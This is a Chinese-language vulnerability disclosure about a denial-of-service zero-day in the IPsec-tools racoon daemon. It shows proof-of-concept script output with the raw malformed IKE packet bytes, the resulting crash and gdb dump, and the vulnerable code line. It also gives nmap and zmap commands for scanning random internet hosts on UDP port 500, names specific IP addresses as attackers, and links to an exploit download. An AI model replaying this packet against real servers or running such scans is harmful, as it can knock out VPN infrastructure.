IPsec-tools近日曝出拒絕服務(wù)0day漏洞，并且互聯(lián)網(wǎng)上已經(jīng)出現(xiàn)利用程序。你可能質(zhì)疑該漏洞甚至未達(dá)到中等漏洞的評(píng)級(jí)，但請(qǐng)記住IPsec是至關(guān)重要的基礎(chǔ)設(shè)施，并且這種攻擊只需要兩個(gè)小的UDP數(shù)據(jù)包。如果有打開(kāi)日志記錄或者用戶經(jīng)常斷開(kāi)或重新連接那么就很容易被發(fā)現(xiàn)，它可能會(huì)創(chuàng)建Intrusion Detection/Prevention (IDP)簽名，更多的是，你可能需要運(yùn)行一個(gè)蜜罐來(lái)進(jìn)行檢測(cè)。

如果你有使用IPsec-tools，明智的做法就是盡快替換它。

什么是IPsec

IPsec是一款用于關(guān)鍵基礎(chǔ)設(shè)施的軟件。它改進(jìn)IP棧，這樣IP層以下的所有協(xié)議都可以進(jìn)行加密(TCP, UDP等等)。其通常被描述為VPN，同時(shí)也是VPN的一部分，但不要搞混淆IPsec到底是做什么的。

IPsec試圖提供的特性：

加密(可選)
身份驗(yàn)證(可選)
保密性
完整性
可用性?

Demo：附在文末

用法：

python3 repro_racoon_dos129.py
Warning: Unable to bind to port 500. Might not work. [Errno 13] Permission denied
Umm, okay.129 ('\x81\xcf{r\x8e\xb6a\xdd9\xf1\x87cP\xb1\x05\xc7\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00\x00\x98\r\x00\x00<\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x000\x01\x01\x00\x01\x00\x00\x00(\x01\x01\x00\x00\x80\x0b\x00\x01\x00\x0c\x00\x04\x00\x01Q\x80\x80\x01\x00\x07\x80\x0e\x01\x00\x80\x03\x00\x03\x80\x02\x00\x02\x80\x04\x00\x05\r\x00\x00\x14J\x13\x1c\x81\x07\x03XE\\W(\xf2\x0e\x95E/\r\x00\x00\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00\x00\x00\x00\x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\x80\x00\x00\x00', ('192.168.88.247', 500))129 sending second packet
Umm, okay.

服務(wù)器崩潰：

sudo racoon -F -v -f server_racoon.conf >server_dos5m.txt 2>&1 &
jvoss@ipsecu:~$ dmesg |tail
[  584.440533] AVX or AES-NI instructions are not detected.
[  584.442253] AVX or AES-NI instructions are not detected.
[  584.490468] AVX instructions are not detected.
[13683.867215] init: upstart-udev-bridge main process (361) terminated with status 1
[13683.867223] init: upstart-udev-bridge main process ended, respawning
[13683.867307] init: upstart-file-bridge main process (452) terminated with status 1
[13683.867313] init: upstart-file-bridge main process ended, respawning
[13683.867386] init: upstart-socket-bridge main process (616) terminated with status 1
[13683.867392] init: upstart-socket-bridge main process ended, respawning
[19912.460170] racoon[3701]: segfault at 100 ip 00007fe0eba84ce7 sp 00007ffff51db730 error 4 in racoon[7fe0eba5e000+93000]
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947
2015-04-27 15:22:14: [169.254.44.43] ERROR: ignore the packet, received unexpecting payload type 128.
2015-04-27 15:22:14: INFO: respond new phase 1 negotiation: 169.254.88.251[500]<=>169.254.44.43[42258]
2015-04-27 15:22:14: INFO: begin Identity Protection mode.
2015-04-27 15:22:14: INFO: received Vendor ID: RFC 3947
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947
Program received signal SIGSEGV, Segmentation fault.
0x000055555557ace7 in ?? ()
(gdb) bt
#0  0x000055555557ace7 in ?? ()
#1  0x000055555557b775 in ?? ()
#2  0x000055555556c1a1 in ?? ()
#3  0x0000555555563fd1 in ?? ()
#4  0x00005555555658ec in ?? ()
#5  0x000055555555fc9d in ?? ()
#6  0x000055555555f273 in ?? ()
#7  0x00007ffff6953ec5 in __libc_start_main (main=0x55555555f010, argc=5, argv=0x7fffffffe738, init=<optimized out>, 
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe728) at libc-start.c:287
#8  0x000055555555f3ec in ?? ()
(gdb) x/15i $rip - 12
   0x55555557acdb:      mov    %eax,0x1c8(%rsp)
   0x55555557ace2:      mov    0x28(%r12),%rax
=> 0x55555557ace7:      mov    0x100(%rax),%rax
   0x55555557acee:      mov    0x30(%rax),%rax
   0x55555557acf2:      test   %rax,%rax
   0x55555557acf5:      je     0x55555557af00
   0x55555557acfb:      mov    (%rax),%rdx
   0x55555557acfe:      lea    0x20(%rsp),%r13
   0x55555557ad03:      mov    0x8(%rax),%rax
   0x55555557ad07:      lea    0x1c(%rsp),%rbx
   0x55555557ad0c:      lea    0x30(%rsp),%rsi
   0x55555557ad11:      mov    %r13,%rcx
   0x55555557ad14:      mov    %rdx,0x30(%rsp)
   0x55555557ad19:      mov    %rbx,%rdi
   0x55555557ad1c:      xor    %edx,%edx
(gdb) i r
rax            0x0      0
rbx            0x0      0
rcx            0x5555558dbe40   93824995933760
rdx            0x5555558dbe40   93824995933760
rsi            0x0      0
rdi            0x5555558dbdc0   93824995933632
rbp            0x5555558dbdc0   0x5555558dbdc0
rsp            0x7fffffffd180   0x7fffffffd180
r8             0x5555558dbdc0   93824995933632
r9             0x7ffff6cf07b8   140737334151096
r10            0xbdb00  776960
r11            0x5555558da301   93824995926785
r12            0x5555558da300   93824995926784
r13            0x555555822460   93824995173472
r14            0x5555558da420   93824995927072
r15            0x7fffffffd260   140737488343648
rip            0x55555557ace7   0x55555557ace7
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

#p#

不使用IPsec

IPsec有許多易受到攻擊的操作模式，你可以從他的配置中看出來(lái)。

不要使用預(yù)共享密鑰
不使用防火墻阻止攻擊者橋接你的網(wǎng)絡(luò)
不要讓個(gè)人或者沒(méi)有IT主管的公司橋接你的網(wǎng)絡(luò)
不要使用IPsec代替TLS
不要使用IPsec防止0-day
如果你沒(méi)有一個(gè)能干的IT人，不要運(yùn)行它
不要購(gòu)買一個(gè)沒(méi)有更新的IPsec設(shè)備軟件
....

如果NSA想要獲取你的所有數(shù)據(jù)，那么他們完全有這個(gè)能力。

關(guān)于漏洞

漏洞位置：

if (iph1->rmconf->proposal->gssid != NULL) {

Fuzzer(漏洞檢查工具)好像錯(cuò)過(guò)了什么，黑客們好像也錯(cuò)過(guò)了什么。如果不是我幸運(yùn)以及堅(jiān)持，可能我也會(huì)錯(cuò)過(guò)些什么東西。

NetBSD, FreeBSD, Android以及其他許多產(chǎn)品都在使用IPsec tools，我認(rèn)為這就有必要去尋找發(fā)掘漏洞。我檢測(cè)Makefile文件，在GSSAPI中Android并沒(méi)有進(jìn)行編譯。

IPsec作者沒(méi)有回應(yīng)我們的多次請(qǐng)求，我們也沒(méi)有聯(lián)系FreeBSD或NetBSD,因?yàn)槲覀儧](méi)有花足夠的時(shí)間來(lái)檢查kame.net。說(shuō)實(shí)話看著NetBSD就蛋疼，我不會(huì)花過(guò)多的時(shí)間來(lái)安裝FreeBSD或NetBSD。我的同事在SourceForge已經(jīng)發(fā)布這個(gè)漏洞，而我要做的事情就是充分的披露它。

修復(fù)一個(gè)漏洞需要多久

如果沒(méi)有類似的缺陷，修復(fù)一個(gè)漏洞大概需要1個(gè)小時(shí)左右，通知使用者卻需要20小時(shí)左右。

我不愿意做這樣的事情，這個(gè)問(wèn)題自然有CVE解決。

實(shí)在無(wú)力吐槽IPsec-tools，如果你是它的死忠粉請(qǐng)不要來(lái)黑我。不介意的話我可以再?gòu)钠渲姓覀€(gè)漏洞出來(lái)，再次公開(kāi)!

意義何在

當(dāng)IKE daemon崩潰，可能會(huì)導(dǎo)致重新啟動(dòng)。一旦重新啟動(dòng)，就給了攻擊者更多嘗試啟動(dòng)IKE daemon的機(jī)會(huì)，結(jié)果：未知。如果不重新啟動(dòng)，密鑰不會(huì)改變。當(dāng)重復(fù)4次就會(huì)喪失其完整性和機(jī)密性，重啟又變得很容易了，結(jié)果：潛在妥協(xié)。

如果系統(tǒng)判斷這兩個(gè)設(shè)備不應(yīng)該再使用IPsec，系統(tǒng)會(huì)恢復(fù)默認(rèn)狀態(tài)，結(jié)果：可能完全妥協(xié)。

當(dāng)加密完全被破環(huán)，加密層以下就很容易被攻擊者攻破。

IPsec被設(shè)計(jì)為運(yùn)行于公共網(wǎng)絡(luò)，中間人攻擊也并非只是理論。中間人攻擊經(jīng)常用在WIFI，公司網(wǎng)絡(luò)(平面拓?fù)浣Y(jié)構(gòu))，服務(wù)器(DMZ/segmented)，骨干路由器(ISP)

我并沒(méi)有在這里危言聳聽(tīng)。利用該漏洞，單獨(dú)一個(gè)人來(lái)攻擊公司網(wǎng)絡(luò)的可能性十分低(一個(gè)人至少需要4個(gè)小時(shí)的時(shí)間來(lái)嘗試)。NSA攻破伊朗air-gapped網(wǎng)絡(luò)并摧毀其離心機(jī)，如果他想獲取你所擁有的東西，使用該漏洞簡(jiǎn)直輕而易舉!

關(guān)于IPsec設(shè)計(jì)

IPsec協(xié)議過(guò)于復(fù)雜，缺少x.509的靈活性，TLVs的設(shè)計(jì)是為了減少緩沖區(qū)溢出，開(kāi)發(fā)者混淆不清導(dǎo)致出現(xiàn)許多錯(cuò)誤。IKE daemon經(jīng)常被設(shè)置為root權(quán)限，任何的IP數(shù)據(jù)包都可以瀏覽IPsec，實(shí)現(xiàn)IKE客戶端只用了8個(gè)小時(shí)，實(shí)現(xiàn)IKE服務(wù)端只用了8個(gè)小時(shí)。我們?yōu)槭裁葱枰`活性?IPsec的作者應(yīng)該為他自己感到羞愧，他們的思維依舊還活在90年代 。我們?yōu)槭裁催€沒(méi)有取代IPsec?Bruce Schneier曾公開(kāi)譴責(zé)IPsec，對(duì)于IPsec這已經(jīng)不是什么新鮮事了，但對(duì)于IPsec的使用者來(lái)說(shuō)這絕對(duì)不是一件好事情。

誰(shuí)在使用IPsec-tools

IPsec-tools有一個(gè)唯一的響應(yīng)簽名，你可以寫一個(gè)Nmap腳本去檢測(cè)。以下測(cè)試沒(méi)有在FreeBSD和NetBSD上進(jìn)行進(jìn)行。

你不需要運(yùn)行

nmap -sU -Pn -n -vvv -iR 100000 -p 500 -oA nmap_ike1

或者

sudo nmap -sU -sV -O -Pn -n -vvv -iR 100000 -p 500 -oA nmap_ike2

再或者

sudo zmap ike

為了尋找一長(zhǎng)串IPsec-tools使用者列表，你不需要進(jìn)行網(wǎng)絡(luò)調(diào)查，nmap并不能輕松的使用這個(gè)exploit尋找漏洞服務(wù)器。

IPsec掃描器

目前有很多的IPsec掃描器在掃描使用IPv4協(xié)議的IKE服務(wù)器。你認(rèn)為他們這樣做的目的是什么?一些人僅僅只是進(jìn)行研究，一些人就是純粹的腳本小子，一些人就是為了進(jìn)行IP地址欺騙攻擊。據(jù)我的推測(cè)手握0day的他們正在利用這個(gè)漏洞攻擊他們所遇到的所有VPN，從他們發(fā)送的數(shù)據(jù)包就可以看得出來(lái)。

數(shù)量   IP地址

915   92.156.83.10

413   88.182.227.2

379   222.64.125.46

366   202.153.47.42

156   92.139.69.91

146   195.87.244.8

134   2.12.52.14

132   5.107.86.214

115   93.100.141.178

113   212.57.6.226

102   212.21.46.34

98     41.214.10.33

92    114.35.125.229

90    41.136.2.241

90    41.136.18.209

85    79.165.141.243

79    67.68.122.156

79    46.14.13.125

64    124.148.219.105

60    190.199.39.243

59    203.59.158.2

57    95.29.206.187

56    185.56.161.133

56    154.70.115.98

46    41.136.47.233

45    86.235.41.154

43    212.87.172.4

42    89.157.119.185

41    50.189.102.250

幻燈片地址

[https://www.altsci.com/ipsec/ipsecs2a.html]

IPsec-tools 0-day Exploit

[鏈接：http://pan.baidu.com/s/1o6C9mOU 密碼：tfn4]

sig

[鏈接：http://pan.baidu.com/s/1dDo5bo9 密碼：4iki]